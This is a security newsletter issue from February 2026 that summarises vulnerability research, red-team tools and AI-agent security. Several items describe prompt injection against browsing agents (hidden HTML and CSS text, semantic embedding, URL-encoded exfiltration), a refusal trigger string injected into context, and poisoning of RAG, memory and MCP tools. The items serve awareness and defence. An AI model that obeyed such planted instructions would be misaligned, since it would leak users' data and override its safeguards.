Release Date: 16th February 2026 | Issue: 59 | Subscribe
The Security Pills newsletter is a hand curated zine (delivered once per week) that highlights security related-news. 10+ hours of reading and analysis condensed into a 5-minute summary every Monday morning.
Sponsor
Would you like to become a sponsor for our newsletter? Our mission is to highlight security-related news with a focus on quality content, while we help people staying up to date with this corner of the industry.If you are interested, reach out to [email protected] with your ad idea to get started!
Application Security
Hacktron AI found an RCE worth $10k in Google's Antigravity IDE browser extension. Because externally_connectable was set to all URLs, any webpage could message the extension directly. The SaveScreenRecording action passed attacker controlled paths to the language server unsanitized, allowing arbitrary file writes via path traversal in the filename parameter and code execution by dropping an executable in the user's Startup folder.
Google added origin validation to the message handler, though the post shows that URL tricks and content script proxies can partially defeat it, with only the tab property check fully holding up.
GMSGadget is a research collection documenting JavaScript gadgets that can bypass XSS mitigations such as Content Security Policy and HTML sanitizers like DOMPurify. The collection catalogs gadgets across dozens of popular JavaScript libraries, providing metadata on browser compatibility, HTML attributes, CSP directives, and execution timing contexts.
These are patched vulnerabilities and intended JavaScript behaviors rather than active exploits.
Palo Alto Unit 42 researchers break down how QR codes are being abused beyond basic phishing across three vectors: shortener services that mask malicious destinations behind trusted domains, in app deep links that trigger account takeovers on Signal, Telegram, WhatsApp and Line or kick off unauthorized payments, and direct APK downloads that skip app store review entirely.
The real issue is that most people scanning a QR code just expect a webpage, not something linking a device to their messaging account or firing off a crypto transaction.
Artificial Intelligence
Doyensec's Luca Carettoni details vulnerabilities found during a manual security audit of Outline, including SSRF, XSS, and an IDOR bypassing authorization checks. To compare results, three AI security platforms were run in parallel against the same codebase. One caught the IDOR, but false positives far outnumbered real findings, and their convincing descriptions made triage harder, reinforcing that AI security tools still work better alongside human expertise than in place of it.
The MCP Trust Registry scanned over 8,000 MCP servers and found that nearly 1 in 10 are compromised by critical vulnerabilities, including command injection flaws below the gateway layer and SSRF exposures that enable single-request access to internal networks. The free directory provides risk scores, vulnerability details, and remediation guidance to inform connection decisions before linking servers to agents.
Trail of Bits launched a security-reviewed Claude Code plugin marketplace to address risks posed by backdoors and malicious hooks discovered in published skills, as well as the lack of built-in quality gates in the plugin ecosystem. The repository hosts plugins that have passed Trail of Bits' code review process, including their own tools and vetted third-party collections.
Community contributions are welcome but must pass a formal security review and include proper attribution before inclusion.
promptfoo's Yash Chhabria explores how adversaries can attack web browsing AI agents by hiding malicious instructions in page content through HTML comments, CSS hidden text, or semantic embedding in legitimate prose. Of these techniques, semantic embedding proves hardest to defend against since models cannot distinguish instructions from content when both look like normal text.
This matters because different models fail differently: Claude's instruction hierarchy helps it resist comment based injections, while GPT 4o/4.1's literal instruction following makes it more vulnerable to authoritative sounding text. Once an injection lands, it enables two outcomes: exfiltrating sensitive data by tricking agents into encoding it in URLs, or manipulating agent behavior by overriding safety guidelines entirely.
Trail of Bits released a production ready configuration framework for Claude Code targeting security audits, development, and research. It provides standardized templates through global CLAUDE.md files that define coding standards and toolchains, alongside specialized MCP servers for vulnerability scanning, binary analysis, and search. The framework includes context management strategies and security focused skills that bundle vulnerability checklists with analysis patterns, supported by multi agent workflows for automated planning and parallel security analysis.
Anthropic researchers put Claude Opus 4.6 in a VM with standard utilities and tools like debuggers and fuzzers, no special instructions or custom harnesses, and it found over 500 high severity memory corruption vulnerabilities in open source codebases. Its approach included digging through Git commit histories to find similar unpatched bugs, spotting unsafe function patterns like strcat, and understanding algorithm specific constraints to trigger edge cases that traditional fuzzers miss. Each finding was validated and deduplicated by Claude, then manually triaged by researchers who wrote patches before reporting.
Anthropic documents a magic string that lets developers trigger Claude 4 refusal behavior during QA testing. Security researcher Austin Parker points out that the real problem is the trigger being deterministic. If an attacker injects the string into prompt context through user input, RAG documents, tool outputs, or shared chat history, Claude immediately halts and returns stop_reason "refusal". In systems that replay conversation history, that poisoned turn persists and breaks every future request until someone cleans the context. It is not a model vulnerability but an integration failure mode, so teams building on Claude should treat refusal handling and context hygiene as part of their security surface.
Wiz's Rami McCarthy looks back at a year of agentic browser security after every major vendor shipped one in 2025. Researchers kept breaking them through zero interaction exfiltration, CometJacking session hijacks, persistent memory poisoning, and task injection. AI browsers also consistently failed to spot phishing, and while vendors have thrown human in the loop confirmations, architectural isolation, and secondary LLM critics at the problem, prompt injection is still unsolved.
For those experimenting now, McCarthy recommends three rules: isolate browser profiles from primary credentials, keep human confirmations on, and limit agents to low stakes tasks.
Blue Team
Slack's Dominic Marks walks through how their security team built a multi-agent AI system for investigating alerts, moving away from earlier prompt-based approaches toward a structured setup where separate agents handle coordination, deep analysis, and quality review across defined investigation phases. In one real investigation, the review agent caught a credential exposure the analyst had missed, which led the coordinator to redirect focus and escalate the finding. The underlying service architecture gives the team real-time visibility into investigations and cost controls, and the agents can surface things that static detection rules would never catch.
Slack's engineering team details Anomaly Event Response (AER), an automated detection and response system for Enterprise Grid that cuts response time from days to minutes. AER monitors billions of daily events with thresholds tuned to each organization's patterns, detecting access from Tor exit nodes, data scraping, excessive downloads, session fingerprint mismatches, and unusual API activity. When triggered, it kills all active sessions and generates audit logs linking back to the originating anomaly. The system tracks whether suspicious behavior persists after terminations while preventing legitimate users from getting stuck in a loop.
Cloud Security
Sysdig researchers documented a cloud intrusion where threat actors used LLM assistance to compromise AWS in under 10 minutes, starting with credentials from public S3 buckets. The attackers escalated privileges through Lambda code injection, moved laterally across 19 AWS principals, created backdoor admin users, abused Bedrock for LLMjacking, and launched GPU instances.
LLM generated code with Serbian comments, hallucinated account IDs, and non existent GitHub repository references throughout the operation confirmed AI assisted execution.
Tenable's Liv Matan discovered two critical vulnerabilities in Google Looker, collectively dubbed "LookOut", enabling complete system compromise. The first chains path traversal, Git hook manipulation, and timing issues to achieve remote code execution. The second (CVE-2025-12743) bypasses security controls by intercepting web requests to access Looker's internal MySQL database, then uses SQL injection through LookML data tests to extract user data, system configurations, and stored secrets.
In Google Cloud environments these flaws could allow cross tenant access to other customers' data. While Google patched its managed Looker instances, organizations running customer hosted or on premises versions remain exposed until they apply the necessary updates.
Snowflake audit logs can arrive hours late, so if your export pipeline advances the watermark to CURRENT_TIMESTAMP on each run, you're permanently skipping events. The fix is using the observed MAX(timestamp) from each export window and only advancing after a successful write. The article provides a full implementation: a stored procedure that runs every five minutes via a Snowflake task, incrementally exporting 20 audit views as partitioned JSON to S3. If something fails, state doesn't change and the next run picks up where it left off.
Reversec's Christian Philipov digs into SharePoint Online's pre authentication URL feature, enabled by default across tenants. SharePoint generates signed download URLs with a tempauth token for every file, and these bypass IP allowlists, Conditional Access policies, and sharing restrictions entirely.
An attacker with read access can enumerate files via SharePoint's REST APIs and download them from any IP without needing session cookies. MSRC called it a guardrail rather than a security boundary and rated it low severity. Philipov recommends disabling it with Set-SPOTenantPreAuthSettings -IsDisabled $true unless there's a specific business need.
Container Security
Docker released Sandboxes, using microVM isolation to let coding agents run unsupervised in dedicated environments on macOS and Windows. Each sandbox is a full dev environment where agents can install packages and run containers, fully isolated from the host with network controls and instant resets. No more constant permission prompts or risking your system just to let an agent do its job.
Red Team
Maldev Academy released DumpBrowserSecrets, a tool for extracting credentials, cookies, credit cards, tokens, and browsing history from Chrome, Edge, Firefox, Opera, and Vivaldi. It uses an executable to parse browser databases and a specialized DLL to retrieve encryption keys through process injection techniques. The tool handles different encryption schemes across browser families and offers flexible options for targeted or bulk extraction.
SpecterOps' Andrew Gomez and Allen DeMoura released azureBlob, a Mythic C2 profile that routes agent communication through Azure Blob Storage, taking advantage of the broad *.blob.core.windows.net firewall exceptions that vendors like Citrix, Parallels, and Nerdio recommend in their deployment guides. Each agent gets a container scoped SAS token at payload generation so if one gets burned the damage stays contained, and the storage account key never leaves the Mythic server. Agents communicate through simple blob PUTGETDELETE operations, and the server discovers new agents automatically by enumerating containers.
Supply Chain
A Claude Code configuration system that enforces structured development practices through hooks operating at multiple lifecycle points, replacing unsafe defaults like direct main commits and test skipping with controlled workflows. Three specialized agents (Planner, Implementer, and Guardian) coordinate approval cycles while hooks block destructive operations, rewrite unsafe commands, require test evidence before commits, and enforce plan driven development independent of model behavior or context window pressure.
Eugene Lin built a GitHub Action that uses Claude to detect security vulnerabilities in open source repositories by analyzing commit diffs and PR context, only alerting when concrete exploits can be demonstrated. The tool automatically creates vulnerability issues, prevents duplicate analysis, and supports configurable repository monitoring and alert destinations.
Reversec's Thomas Byrne walks through how attackers with write access to Azure DevOps pipelines can extract credentials across multiple vectors, from mapping KeyVault secrets to environment variables for exfiltration, to enumerating secret names via CLI, to pulling GitHub Service Connection tokens from .git/config files. Once extracted, these credentials authenticate to other repositories and downstream services, enabling lateral movement across the org and potentially into on-prem environments through more privileged Service Principals.
Threat Hunting
Datadog researchers identified a campaign using fake GitHub repositories to deliver macOS infostealers through ClickFix social engineering. The attack redirects users through GitHub Pages staging sites that mimic GitHub interfaces before tricking victims into executing malicious commands in Terminal.
The malware collects enterprise artifacts like business documents and RDP configurations, profiles how wallet extensions store secrets, and caps folder collection at 100MB to avoid detection. Later versions maintain persistence through a fake GoogleUpdate binary that checks in with C2 every 60 seconds, giving operators ongoing remote access rather than just a one time data grab.
Christian Schneider breaks down why STRIDE doesn't cut it for agentic AI. It evaluates components individually while real attacks chain across them. His five zone model traces how malicious input moves through input surfaces, planning, tool execution, memory, and inter agent communication. He walks through three scenarios to prove the point: RAG poisoning that hijacks reasoning, MCP tool descriptions that exfiltrate credentials, and multi agent cascades where poisoned context passes through trusted peers into unauthorized actions. Each path gets formalized into attack trees mapped to OWASP, MAESTRO, and ATFAA. From there, map trust boundaries, run scenario workshops before picking controls, and ensure two independent controls per high risk node.
Wrapping Up
If you enjoyed this newsletter and think others would too, It would mean a lot for us if you'd forward this email to other people who may enjoy it as well. You can also reply to this email, I'd love to get in touch with you.
Thanks,
Sebas